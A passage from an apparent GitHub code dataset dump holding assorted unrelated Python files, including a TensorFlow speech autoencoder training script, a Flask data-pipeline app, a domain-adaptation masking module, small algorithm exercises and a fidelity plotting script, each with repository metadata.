False\n","repo_name":"kotadd/competitive_programming","sub_path":"simulation/abc256_d.py","file_name":"abc256_d.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"23663276599","text":"import math\n\ndef make_table(name, proc):\n tabl = []\n for i in range(0, 360):\n tabl.append(proc(math.radians(i)))\n tabl_str = ''\n for v in tabl:\n tabl_str += str(round(v, 6)) + 'f,\\n'\n f = open(name, 'w')\n f.write(tabl_str)\n f.close()\n\nif __name__ == '__main__':\n make_table('sin.txt', math.sin)\n make_table('cos.txt', math.cos)\n make_table('tan.txt', math.tan)\n","repo_name":"Tuhkis/wingame","sub_path":"data/gen_table.py","file_name":"gen_table.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4666943311","text":"import numpy as np\nimport os\n\n\nclass DataLoader(object):\n def __init__(self, xs, ys, batch_size, pad_with_last_sample=True, shuffle=False):\n \"\"\"\n\n :param xs:\n :param ys:\n :param batch_size:\n :param pad_with_last_sample: pad with the last sample to make number of samples divisible to batch_size.\n \"\"\"\n self.batch_size = batch_size\n self.current_ind = 0\n if pad_with_last_sample:\n num_padding = (batch_size - (len(xs) % batch_size)) % batch_size\n x_padding = np.repeat(xs[-1:], num_padding, axis=0)\n y_padding = np.repeat(ys[-1:], num_padding, axis=0)\n xs = np.concatenate([xs, x_padding], axis=0)\n ys = np.concatenate([ys, y_padding], axis=0)\n self.size = len(xs)\n self.num_batch = int(self.size // self.batch_size)\n if shuffle:\n permutation = np.random.permutation(self.size)\n xs, ys = xs[permutation], ys[permutation]\n self.xs = xs\n self.ys = ys\n\n def get_iterator(self):\n self.current_ind = 0\n\n def _wrapper():\n while self.current_ind < self.num_batch:\n start_ind = self.batch_size * self.current_ind\n end_ind = min(self.size, self.batch_size * (self.current_ind + 1))\n x_i = self.xs[start_ind: end_ind, ...]\n y_i = self.ys[start_ind: end_ind, ...]\n yield (x_i, y_i)\n self.current_ind += 1\n\n return _wrapper()\n\n\nclass StandardScaler:\n \"\"\"\n Standard the input\n \"\"\"\n\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def transform(self, data, data_type):\n if data_type == 'x':\n return (data - self.mean) / self.std\n\n if data_type == 'y':\n return (data - self.mean[-1]) / self.std[-1]\n\n def inverse_transform(self, data, data_type):\n if data_type == 'x':\n return (data * self.std) + self.mean\n if data_type == 'y':\n return (data * self.std[-1]) + self.mean[-1]\n\n\ndef make_data_loader(cfg):\n data = {}\n batch_size = cfg.DATA.BATCH_SIZE\n test_batch_size = cfg.DATA.TEST_BATCH_SIZE\n dataset_dir = cfg.DATA.DATASET_DIR\n for category in ['train', 'test']:\n cat_data = np.load(os.path.join(dataset_dir, category + '.npz'))\n data['x_' + category] = cat_data['x']\n data['y_' + category] = cat_data['y']\n\n scaler = StandardScaler(mean=np.mean(data['x_train'], axis=(0, 1, 2)), std=np.std(data['x_train'], axis=(0, 1, 2)))\n\n for category in ['train', 'test']:\n data['x_' + category] = scaler.transform(data['x_' + category], 'x')\n data['y_' + category] = scaler.transform(data['y_' + category], 'y')\n pass\n\n data['train_loader'] = DataLoader(data['x_train'], data['y_train'], batch_size, shuffle=True)\n data['test_loader'] = DataLoader(data['x_test'], data['y_test'], test_batch_size, shuffle=False)\n data['scaler'] = scaler\n\n return data\n","repo_name":"ZixianReid/blue_green_alage_prediction","sub_path":"pred_core/data/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"622304877","text":"def GetRandomChar():\r\n import random\r\n a=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n b=\"abcdefghijklmnopqrstuvwxyz\"\r\n c=\"0123456789\"\r\n random_str=\"\"\r\n single=random.choice(a+b+c)\r\n random_str+=single\r\n return random_str\r\ncode=\"\"\r\nfor i in range(8):\r\n code+=GetRandomChar()\r\nprint(\"8位验证码为:{}\".format(code))\r\n","repo_name":"sadDarkHorse/SCUT-Python-Course","sub_path":"课后作业/实验(第5章_2)/5.2.py","file_name":"5.2.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32990025846","text":"import random\n\nimport torch\nfrom torch.nn import Module\n\nfrom mmseg.models.uda.teacher_module import EMATeacher\nfrom mmseg.models.utils.dacs_transforms import get_mean_std, strong_transform\nfrom mmseg.models.utils.masking_transforms import build_mask_generator\n\n\nclass MaskingConsistencyModule(Module):\n\n def __init__(self, require_teacher, cfg):\n super(MaskingConsistencyModule, self).__init__()\n\n self.source_only = cfg.get('source_only', False)\n self.max_iters = cfg['max_iters']\n self.color_jitter_s = cfg['color_jitter_strength']\n self.color_jitter_p = cfg['color_jitter_probability']\n\n self.mask_mode = cfg['mask_mode']\n self.mask_alpha = cfg['mask_alpha']\n self.mask_pseudo_threshold = cfg['mask_pseudo_threshold']\n self.mask_lambda = cfg['mask_lambda']\n self.mask_gen = build_mask_generator(cfg['mask_generator'])\n\n assert self.mask_mode in [\n 'separate', 'separatesrc', 'separatetrg', 'separateaug',\n 'separatesrcaug', 'separatetrgaug'\n ]\n\n self.teacher = None\n if require_teacher or \\\n self.mask_alpha != 'same' or \\\n self.mask_pseudo_threshold != 'same':\n self.teacher = EMATeacher(use_mask_params=True, cfg=cfg)\n\n self.debug = False\n self.debug_output = {}\n\n def update_weights(self, model, iter):\n if self.teacher is not None:\n self.teacher.update_weights(model, iter)\n\n def update_debug_state(self):\n if self.teacher is not None:\n self.teacher.debug = self.debug\n\n def __call__(self,\n model,\n img,\n img_metas,\n gt_semantic_seg,\n target_img,\n target_img_metas,\n valid_pseudo_mask,\n pseudo_label=None,\n pseudo_weight=None):\n self.update_debug_state()\n self.debug_output = {}\n model.debug_output = {}\n dev = img.device\n means, stds = get_mean_std(img_metas, dev)\n\n if not self.source_only:\n # Share the pseudo labels with the host UDA method\n if self.teacher is None:\n assert self.mask_alpha == 'same'\n assert self.mask_pseudo_threshold == 'same'\n assert pseudo_label is not None\n assert pseudo_weight is not None\n masked_plabel = pseudo_label\n masked_pweight = pseudo_weight\n # Use a separate EMA teacher for MIC\n else:\n masked_plabel, masked_pweight = \\\n self.teacher(\n target_img, target_img_metas, valid_pseudo_mask)\n if self.debug:\n self.debug_output['Mask Teacher'] = {\n 'Img': target_img.detach(),\n 'Pseudo Label': masked_plabel.cpu().numpy(),\n 'Pseudo Weight': masked_pweight.cpu().numpy(),\n }\n # Don't use target images at all\n if self.source_only:\n masked_img = img\n masked_lbl = gt_semantic_seg\n b, _, h, w = gt_semantic_seg.shape\n masked_seg_weight = None\n # Use 1x source image and 1x target image for MIC\n elif self.mask_mode in ['separate', 'separateaug']:\n assert img.shape[0] == 2\n masked_img = torch.stack([img[0], target_img[0]])\n masked_lbl = torch.stack(\n [gt_semantic_seg[0], masked_plabel[0].unsqueeze(0)])\n gt_pixel_weight = torch.ones(masked_pweight[0].shape, device=dev)\n masked_seg_weight = torch.stack(\n [gt_pixel_weight, masked_pweight[0]])\n # Use only source images for MIC\n elif self.mask_mode in ['separatesrc', 'separatesrcaug']:\n masked_img = img\n masked_lbl = gt_semantic_seg\n masked_seg_weight = None\n # Use only target images for MIC\n elif self.mask_mode in ['separatetrg', 'separatetrgaug']:\n masked_img = target_img\n masked_lbl = masked_plabel.unsqueeze(1)\n masked_seg_weight = masked_pweight\n else:\n raise NotImplementedError(self.mask_mode)\n\n # Apply color augmentation\n if 'aug' in self.mask_mode:\n strong_parameters = {\n 'mix': None,\n 'color_jitter': random.uniform(0, 1),\n 'color_jitter_s': self.color_jitter_s,\n 'color_jitter_p': self.color_jitter_p,\n 'blur': random.uniform(0, 1),\n 'mean': means[0].unsqueeze(0),\n 'std': stds[0].unsqueeze(0)\n }\n masked_img, _ = strong_transform(\n strong_parameters, data=masked_img.clone())\n\n # Apply masking to image\n masked_img = self.mask_gen.mask_image(masked_img)\n\n # Train on masked images\n masked_loss = model.forward_train(\n masked_img,\n img_metas,\n masked_lbl,\n seg_weight=masked_seg_weight,\n )\n if self.mask_lambda != 1:\n masked_loss['decode.loss_seg'] *= self.mask_lambda\n\n if self.debug:\n self.debug_output['Masked'] = model.debug_output\n if masked_seg_weight is not None:\n self.debug_output['Masked']['PL Weight'] = \\\n masked_seg_weight.cpu().numpy()\n\n return masked_loss\n","repo_name":"lhoyer/MIC","sub_path":"seg/mmseg/models/uda/masking_consistency_module.py","file_name":"masking_consistency_module.py","file_ext":"py","file_size_in_byte":5501,"program_lang":"python","lang":"en","doc_type":"code","stars":200,"dataset":"github-code","pt":"18"} +{"seq_id":"18698219865","text":"import argparse\nimport os.path\nimport sys, os\n\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\n\nimport autoencoder\nimport input_data2 as input_data\nimport models\nfrom tensorflow.python.platform import gfile\n\n\ntf = tf.compat.v1\nFLAGS = None\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"2\"\n\ndef main(_):\n min_val = -1.0\n min_val_ = -1.0\n cp_path = ''\n current_patient = 1\n my_patient = 3\n\n def early_stopping(val, cp, patient=3):\n nonlocal min_val, min_val_, cp_path, current_patient\n if min_val == -1.0:\n min_val = val\n min_val_ = round(val, 1)\n cp_path = cp\n return False\n\n if val < min_val_:\n min_val_ = val\n cp_path = cp\n\n val = round(val, 1)\n if val < min_val:\n min_val = val\n current_patient = 1\n else:\n current_patient += 1\n return True if current_patient >= patient else False\n\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.01)\n config = tf.ConfigProto(gpu_options=gpu_options)\n config.gpu_options.allow_growth = True\n\n # Start a new TensorFlow session.\n sess = tf.InteractiveSession(config=None)\n\n # We want to see all the logging messages for this tutorial.\n tf.logging.set_verbosity(tf.logging.INFO)\n\n # Begin by making sure we have the training data we need. If you already have\n # training data of your own, use `--data_url= ` on the command line to avoid\n # downloading.\n model_settings = models.prepare_model_settings(\n 1,\n FLAGS.sample_rate, FLAGS.clip_duration_ms, FLAGS.window_size_ms,\n FLAGS.window_stride_ms)\n audio_processor = input_data.AudioProcessor(\n FLAGS.mode, FLAGS.data_dir, FLAGS.silence_percentage,\n FLAGS.unknown_percentage, FLAGS.validation_percentage,\n FLAGS.testing_percentage, model_settings, FLAGS.test_dir)\n fingerprint_size = model_settings['fingerprint_size']\n model_settings['label_count'] = len(audio_processor.words_list)\n label_count = model_settings['label_count']\n time_shift_samples = int((FLAGS.time_shift_ms * FLAGS.sample_rate) / 1000)\n training_set_settings = {\n 'how_many': FLAGS.batch_size,\n 'offset': 0,\n 'background_frequency': FLAGS.background_frequency,\n 'background_volume_range': FLAGS.background_volume,\n 'time_shift': time_shift_samples,\n 'mode': 'training'\n }\n audio_processor.start_generator(training_set_settings,)\n\n # Figure out the learning rates for each training phase. Since it's often\n # effective to have high learning rates at the start of training, followed by\n # lower levels towards the end, the number of steps and learning rates can be\n # specified as comma-separated lists to define the rate at each stage. For\n # example --how_many_training_steps=10000,3000 --learning_rate=0.001,0.0001\n # will run 13,000 training loops in total, with a rate of 0.001 for the first\n # 10,000, and 0.0001 for the final 3,000.\n training_steps_list = list(map(int, FLAGS.how_many_training_steps.split(',')))\n tf.logging.info(training_steps_list)\n\n # 100 * 3920\n fingerprint_input = tf.placeholder(\n tf.float32, [None, fingerprint_size], name='fingerprint_input')\n\n logits, dropout_prob = autoencoder.create_blstm_model(\n fingerprint_input,\n model_settings,\n is_training=True)\n\n # Define loss and optimizer\n ground_truth_input = tf.placeholder(\n tf.float32, [None, fingerprint_size], name='groundtruth_input')\n\n # Create the back propagation and training evaluation machinery in the graph.\n with tf.name_scope('loss'):\n my_loss = tf.reduce_sum(tf.keras.losses.binary_crossentropy(ground_truth_input, logits), -1)\n loss = tf.reduce_mean(my_loss)\n tf.summary.scalar('my_loss', loss)\n\n global_step = tf.train.get_or_create_global_step()\n increment_global_step = tf.assign(global_step, global_step + 1)\n\n #checks = tf.add_check_numerics_ops()\n control_dependencies = []\n if not FLAGS.check_nans:\n control_dependencies = []\n\n with tf.name_scope('train'), tf.control_dependencies(control_dependencies):\n\n lr = FLAGS.learning_rate\n step_rate = 400\n decay = 0.9\n learning_rate = tf.train.exponential_decay(lr, global_step - 1, step_rate, decay,\n staircase=True)\n\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n train_step = optimizer.minimize(my_loss)\n\n saver = tf.train.Saver(tf.global_variables(), max_to_keep=my_patient + 1)\n\n # Merge all the summaries and write them out to /tmp/retrain_logs (by default)\n merged_summaries = tf.summary.merge_all()\n train_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/train',\n sess.graph)\n validation_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/validation')\n testing_writer = tf.summary.FileWriter(FLAGS.summaries_dir + '/testing')\n\n init = tf.global_variables_initializer()\n sess.run(init)\n\n start_step = 1\n checkpoint_path = os.path.join(FLAGS.train_dir,\n FLAGS.model_architecture)\n if FLAGS.start_checkpoint:\n models.load_variables_from_checkpoint(sess, FLAGS.start_checkpoint)\n start_step = sess.run(global_step)\n\n tf.logging.info('Training from step: %d ' % start_step)\n\n # Save graph.pbtxt.\n tf.train.write_graph(sess.graph_def, FLAGS.train_dir,\n FLAGS.model_architecture + '.pbtxt')\n\n # Save list of words.\n with gfile.GFile(\n os.path.join(FLAGS.train_dir, 'labels.txt'),\n 'w') as f:\n f.write('\\n'.join(audio_processor.words_list))\n\n final = 0\n epoch = 0\n # Training loop.\n training_steps_max = sum(training_steps_list)\n for training_step in xrange(start_step, training_steps_max + 1):\n\n # Pull the audio samples we'll use for training.\n train_fingerprints, train_ground_truth = audio_processor.get_data_nb(\n mode='training'\n )\n # Run the graph with this batch of training data.\n train_summary, loss_value, *_ = sess.run(\n [\n merged_summaries, loss, train_step,\n increment_global_step\n ],\n feed_dict={\n fingerprint_input: train_fingerprints,\n ground_truth_input: train_ground_truth,\n dropout_prob: 0.3\n })\n\n learning_rate_value = sess.run(optimizer._lr)\n\n tf.logging.info('Step #%d: rate %f, loss %f, %d' %\n (training_step, learning_rate_value,\n loss_value, current_patient))\n is_last_step = (training_step == training_steps_max)\n if (training_step % 100 == 0) or is_last_step:\n\n pass\n\n if (training_step % FLAGS.eval_step_interval) == 0 or is_last_step:\n epoch += 1\n train_writer.add_summary(train_summary, epoch)\n\n set_size = audio_processor.set_size('validation')\n tloss = 0.0\n for i in xrange(0, set_size, FLAGS.batch_size):\n validation_fingerprints, validation_ground_truth = (\n audio_processor.get_data_nb(how_many=FLAGS.batch_size, offset=i,\n mode='validation'))\n # Run a validation step and capture training summaries for TensorBoard\n # with the `merged` op.\n vloss, *_ = sess.run(\n [loss],\n feed_dict={\n fingerprint_input: validation_fingerprints,\n ground_truth_input: validation_ground_truth,\n dropout_prob: 0.0 # keep all\n })\n batch_size = min(FLAGS.batch_size, set_size - i)\n tloss += (vloss * batch_size) / set_size\n val = tloss\n\n # validation summary\n # Create a new Summary object with your measure\n summary = tf.Summary()\n summary.value.add(tag=\"my_loss\", simple_value=tloss)\n validation_writer.add_summary(summary, epoch)\n\n # Save the model checkpoint periodically.\n tf.logging.info('Saving to \"%s-%d\"' % (checkpoint_path + '.ckpt', training_step))\n cp_path_ = '%s-%d' % (checkpoint_path + '.ckpt', training_step)\n saver.save(sess, checkpoint_path + '.ckpt', global_step=training_step)\n final = training_step + 1\n\n set_size = audio_processor.set_size('testing') #* 0\n if set_size:\n tloss = 0.0\n for i in xrange(0, set_size, FLAGS.batch_size):\n testing_fingerprints, testing_ground_truth = (\n audio_processor.get_data_nb(how_many=FLAGS.batch_size, offset=i,\n mode='testing'))\n\n testloss, *_ = sess.run(\n [loss],\n feed_dict={\n fingerprint_input: testing_fingerprints,\n ground_truth_input: testing_ground_truth,\n dropout_prob: 0.0 # keep all\n })\n batch_size = min(FLAGS.batch_size, set_size - i)\n tloss += (testloss * batch_size) / set_size\n\n # testing summary\n # Create a new Summary object with your measure\n summary = tf.Summary()\n summary.value.add(tag=\"my_loss\", simple_value=tloss)\n testing_writer.add_summary(summary, epoch)\n\n if early_stopping(val, cp_path_, my_patient):\n tf.logging.info('Current patient %d, %.1f' % (current_patient, round(val, 1)))\n tf.logging.info('%s : %.1f' % (cp_path, min_val))\n break\n tf.logging.info('Current patient %d, %.1f' % (current_patient, round(val, 1)))\n tf.logging.info('%s : %.1f' % (cp_path, min_val))\n # restore best weights and save\n models.load_variables_from_checkpoint(sess, cp_path)\n\n saver.save(sess, checkpoint_path + '.ckpt', global_step=final)\n\n sess.close()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--mode',\n type=int,\n default=0,\n help='0,1,2,3,4')\n parser.add_argument(\n '--data_dir',\n type=str,\n default='/home/hungshing/FastData/ezTalk/users/msn9110/voice_data/training/_0',\n help=\"\"\"\\\n Where to download the speech training data to.\n \"\"\")\n parser.add_argument(\n '--test_dir',\n type=str,\n default='/home/hungshing/FastData/ezTalk/users/msn9110/voice_data/testing',\n help=\"\"\"\\\n Custom testing set\n \"\"\")\n parser.add_argument(\n '--background_volume',\n type=float,\n default=0.1,\n help=\"\"\"\\\n How loud the background noise should be, between 0 and 1.\n \"\"\")\n parser.add_argument(\n '--background_frequency',\n type=float,\n default=0.8,\n help=\"\"\"\\\n How many of the training samples have background noise mixed in.\n \"\"\")\n parser.add_argument(\n '--silence_percentage',\n type=float,\n default=10.0,\n help=\"\"\"\\\n How much of the training data should be silence.\n \"\"\")\n parser.add_argument(\n '--unknown_percentage',\n type=float,\n default=10.0,\n help=\"\"\"\\\n How much of the training data should be unknown words.\n \"\"\")\n parser.add_argument(\n '--time_shift_ms',\n type=float,\n default=100.0,\n help=\"\"\"\\\n Range to randomly shift the training audio by in time.\n \"\"\")\n parser.add_argument(\n '--testing_percentage',\n type=int,\n default=0,\n help='What percentage of wavs to use as a test set.')\n parser.add_argument(\n '--validation_percentage',\n type=int,\n default=10,\n help='What percentage of wavs to use as a validation set.')\n parser.add_argument(\n '--sample_rate',\n type=int,\n default=16000,\n help='Expected sample rate of the wavs', )\n parser.add_argument(\n '--clip_duration_ms',\n type=int,\n default=1000,\n help='Expected duration in milliseconds of the wavs', )\n parser.add_argument(\n '--window_size_ms',\n type=float,\n default=32.0,\n help='How long each spectrogram timeslice is', )\n parser.add_argument(\n '--window_stride_ms',\n type=float,\n default=10.0,\n help='How long each spectrogram timeslice is', )\n parser.add_argument(\n '--how_many_training_steps',\n type=str,\n default='15000,3000',\n help='How many training loops to run', )\n parser.add_argument(\n '--eval_step_interval',\n type=int,\n default=400,\n help='How often to evaluate the training results. and Save model checkpoint every'\n ' save_steps.')\n parser.add_argument(\n '--learning_rate',\n type=float,\n default=0.001,\n help='How large a learning rate to use when training at start.')\n parser.add_argument(\n '--batch_size',\n type=int,\n default=100,\n help='How many items to train with at once', )\n parser.add_argument(\n '--summaries_dir',\n type=str,\n default='.temp/logs',\n help='Where to save summary logs for TensorBoard.')\n parser.add_argument(\n '--wanted_words',\n type=str,\n default='yes,no,up,down,left,right,on,off,stop,go',\n help='Words to use (others will be added to an unknown label)', )\n parser.add_argument(\n '--train_dir',\n type=str,\n default='.temp/ckpts',\n help='Directory to write event logs and checkpoint.')\n parser.add_argument(\n '--start_checkpoint',\n type=str,\n default='',\n help='If specified, restore this pretrained model before any training.')\n parser.add_argument(\n '--model_architecture',\n type=str,\n default='conv',\n help='What model architecture to use')\n parser.add_argument(\n '-chk', '--check_nans',\n action='store_true',\n help='Whether to check for invalid numbers during processing')\n\n FLAGS, unparsed = parser.parse_known_args()\n main([sys.argv[0]] + unparsed)\n\n","repo_name":"msn9110/ezTalk-server","sub_path":"autoencoder/train_v2.py","file_name":"train_v2.py","file_ext":"py","file_size_in_byte":14642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17417922601","text":"import logging\nimport flask_injector\nimport injector\nfrom flask import Flask, jsonify, request\n\nfrom .retriever import BigQuery\nfrom .model import DummyClassifier\nfrom .writer import PostgreSQLDatabase\n\nfrom .dependencies import configure\n\n\ndef create_app(*,\n retriever_class=BigQuery,\n model_class=DummyClassifier,\n writer_class=PostgreSQLDatabase,\n conf=configure):\n app = Flask(\"data-pipeline-ms\")\n\n @app.route('/')\n def hello_world():\n return 'Hello, this is the data pipeline microservice!'\n\n @app.route('/health')\n def healthcheck():\n logging.info(\"Healthcheck endpoint called\")\n return '{\\\"status\\\": \\\"UP\\\"}'\n\n @injector.inject\n @app.route('/model', methods=[\"GET\", \"POST\"])\n def apply_model(retriever: retriever_class, model: model_class, writer: writer_class):\n logging.info(\"Modell endpoint called\")\n user = request.values.get(\"user\")\n\n if not user:\n return jsonify(\"Please provide a valid user id\")\n\n data = retriever.get(user)\n result = {user: model.apply(data)}\n writer.write(result)\n return jsonify(\"Model applied\")\n\n flask_injector.FlaskInjector(app=app, modules=[conf])\n\n return app\n\n\nif __name__ == '__main__':\n application = create_app()\n application.run(host='0.0.0.0', port=5000)\n","repo_name":"kaisahling/datapipeline","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14996597115","text":"def fbnq(n):\n if n < 1:\n print(\"输入有误!\")\n return -1\n\n if n == 1 or n == 2:\n return 1\n else:\n return fbnq(n - 1) + fbnq(n - 2)\n\nnum = int(input(\"欲计算的斐波那契数列的第几位数:\"))\nresult = fbnq(num)\nif result != -1:\n print(\"斐波那契数列的第%d个数字是:%d\" % (num , result))\n","repo_name":"wxdespair/wxdespair.github.com","sub_path":"programming_language/Python/clutter/小程序(py格式)/求斐波那契数列之的一个数(递归版).py","file_name":"求斐波那契数列之的一个数(递归版).py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71439799400","text":"import os\nimport csv\nimport json\nimport numpy as np\n\n\ndef load_friends(filepath):\n with open(filepath, 'r') as f:\n friends_raw = json.loads(f.read())\n return {int(uid): set(friend_uids) for uid, friend_uids in friends_raw.items()}\n\n\ndef load_ideology(filepath):\n ideology = {}\n with open(filepath, 'r') as f:\n r = csv.reader(f, delimiter=',')\n next(r)\n for row in r:\n ideology[int(row[0])] = float(row[1])\n return ideology\n\n\ndef load_all_measures(filepath):\n with open(filepath, 'r') as f:\n return [row for row in csv.reader(f, delimiter='\\t')]\n\n\ndef compute_ideology(twitter_uid, friends, ideology):\n scores = []\n if twitter_uid in friends:\n for fuid in friends[twitter_uid]:\n if fuid in ideology:\n scores.append(ideology[fuid])\n if len(scores) > 0:\n return np.average(scores)\n else:\n return None\n\n\ndef compute_ideologies(measures, friends, ideology_map):\n scores = {}\n for i in range(1, len(measures)):\n uid = int(measures[i][0])\n curr = compute_ideology(uid, friends, ideology_map)\n if curr is not None:\n scores[uid] = curr\n return scores\n\n\ndef compute_friends_ideology(uid, friends, ideologies):\n scores = []\n if uid in friends:\n for fuid in friends[uid]:\n if fuid in ideologies:\n scores.append(ideologies[fuid])\n if len(scores) > 0:\n return np.average(scores)\n else:\n return None\n\nif __name__ == '__main__':\n print('Reading friends.')\n\n retweets = 'with-retweets'\n \n #ideology_map = load_ideology(os.path.join(os.getenv('D'), 'congress', 'final-ideology-map-senate.csv'))\n ideology_map = load_ideology(os.path.join(os.getenv('D'), 'congress', 'ideology-senate.csv'))\n measures = load_all_measures(os.path.join(os.getenv('D'), 'measures', retweets, 'partisanship.tab'))\n friends = load_friends(os.path.join(os.getenv('D'), 'friends.json'))\n \n ideologies = compute_ideologies(measures, friends, ideology_map)\n \n print('ideologies len: {}'.format(len(ideologies)))\n \n dest = os.path.join(os.getenv('D'), 'measures', retweets, 'ideology.tab')\n\n with open(dest, 'w') as f:\n w = csv.writer(f, delimiter='\\t')\n w.writerow(['Twitter ID', 'Ideology'])\n for i in range(1, len(measures)):\n row = measures[i]\n uid = int(row[0])\n if uid in ideologies:\n w.writerow([uid, ideologies[uid]])\n '''\n friends_ideology = compute_friends_ideology(uid, friends, ideologies)\n if friends_ideology is not None:\n row.extend([ideologies[uid], friends_ideology])\n w.writerow(row)\n '''\n","repo_name":"osome-iu/misinfo-partisanship-hksmisinforeview-2021","sub_path":"scripts/compute_ideology.py","file_name":"compute_ideology.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"11517609256","text":"from collections import deque\n\nfrom utils import list2binary_tree\n\n\ndef rightSideView(root):\n \"\"\"\n BFS, with res storing every node\n Time: O(n)\n Space: O(n) que and res\n \"\"\"\n if not root:\n return root\n res = []\n que = deque([(root, 1)])\n # similar approach in level order traversal, but only get the last node in every level now (right most node)\n while que:\n curr_node, level = que.popleft()\n if curr_node.left:\n que.append((curr_node.left, level + 1))\n if curr_node.right:\n que.append((curr_node.right, level + 1))\n\n if len(res) < level:\n res.append([curr_node.val])\n else:\n res[level - 1].append(curr_node.val)\n\n return [lev[-1] for lev in res]\n\n\ndef rightSideView_alt(root):\n \"\"\"\n BFS with level indicator\n Time: O(n)\n Space: O(d) d the diameter of the tree, however in worst case D could be n/2 thus O(n)\n \"\"\"\n if not root:\n return root\n res = []\n # None indicates the end of a level\n que = deque([root, None])\n # maintain curr and prev so that when curr points to None, prev should be the right most node in that layer\n curr = root\n\n while que:\n prev, curr = curr, que.popleft()\n if curr:\n if curr.left:\n que.append(curr.left)\n if curr.right:\n que.append(curr.right)\n else:\n # prev now points to the right most node in the current layer\n res.append(prev.val)\n # just to make sure we won't run into an infinite loop\n if que:\n que.append(None)\n\n return res\n\n\ntest = list2binary_tree([3, 9, 20, 6, None, 15, 7, 8])\nprint(rightSideView_alt(test))\n","repo_name":"filozyu/leetcode-journey","sub_path":"src/binary-tree/binary_tree_right_side_view.py","file_name":"binary_tree_right_side_view.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24840778449","text":"#! /usr/bin/env python\n\n\ndef gifts(b, w, x, y, z):\n b_cost = x if y + z > x else y + z\n w_cost = y if x + z > y else x + z\n return b * b_cost + w * w_cost\n\n\nif __name__ == '__main__':\n t = int(input())\n for _ in range(t):\n b, w = [int(x) for x in input().split()]\n x, y, z = [int(x) for x in input().split()]\n print(gifts(b, w, x, y, z))\n","repo_name":"ahavrylyuk/hackerrank","sub_path":"python3/taum_and_bday.py","file_name":"taum_and_bday.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32581240000","text":"import numpy as np\nfrom os import path, getcwd\nimport pickle\nimport copy\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.inset_locator import (inset_axes, InsetPosition,\n mark_inset)\nfrom matplotlib import cm as cm\nfrom matplotlib import mlab as ml\nimport matplotlib.lines as mlines\nfrom plotter_params import plot_setup\n\nplot_setup()\n\nqubits = [2, 3, 5]\n\nsavefile = path.join(getcwd(), \"data\", \"zero_fidelity_comparison\")\n\np_fidels = []\nzero_fidels = []\nfor nqubits in qubits:\n with open(path.join(savefile, f\"{nqubits}_q_process_fidelities.pickle\"), 'rb') as f:\n _fs = pickle.load(f)\n p_fidels.append(copy.copy(_fs))\n\n with open(path.join(savefile, f\"{nqubits}_q_zero_fidelities.pickle\"), 'rb') as f:\n _fs = pickle.load(f)\n zero_fidels.append(copy.copy(_fs))\n\nfig, ax = plt.subplots(1, 1)\nfig.set_figheight(3.3858)\n\ncol_cyc = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\nmarkers = []\nlabels = []\nfor i, zero_fidel in enumerate(zero_fidels):\n plt.hexbin(p_fidels[i], zero_fidel, color=col_cyc[i], mincnt=1, bins=1,\n gridsize=300, alpha=0.15)\n markers.append(mlines.Line2D([], [], color=col_cyc[i], marker='.', markersize=10,\n lw=0.0, alpha=0.3))\n labels.append(rf\"{qubits[i]} qubits\")\n plt.plot(p_fidels[i], p_fidels[i], color='black', lw=0.5)\n\nplt.legend(tuple(markers), tuple(labels), frameon=False, handletextpad=0.1, loc=2)\n\n\nplt.xlabel(r'Process Fidelity (F)')\nplt.ylabel(r'$0-$Fidelity ($\\tilde{F}_0$)')\n\naxins = inset_axes(ax, width=\"40%\", height=\"40%\", loc=4)\nip = InsetPosition(ax, [0.575, 0.15, 0.425, 0.275])\naxins.set_axes_locator(ip)\n\nfor i, zero_fidel in enumerate(zero_fidels):\n _log_pf = [np.log10(1-j) for j in p_fidels[i]]\n _log_zf = [np.log10(zero_fidel[j]-k) for j, k in enumerate(p_fidels[i])]\n plt.hexbin(_log_pf, _log_zf, alpha=0.3, gridsize=75, mincnt=1, color=col_cyc[i])\n plt.xlabel(r'$|1-F|$')\n plt.ylabel(r'$|F-\\tilde{F}_0|$')\n axins.spines['top'].set_visible(True)\n axins.spines['right'].set_visible(True)\n plt.yticks([-7, -4, -1], labels=[r'$10^{-7}$', r'$10^{-4}$', r'$10^{-1}$'])\n plt.xticks([-6, -4, -2], labels=[r'$10^{-6}$', r'$10^{-4}$', r'$10^{-2}$'])\n axins.invert_yaxis()\n axins.invert_xaxis()\n plt.minorticks_off()\n\nplt.savefig(path.join(savefile, 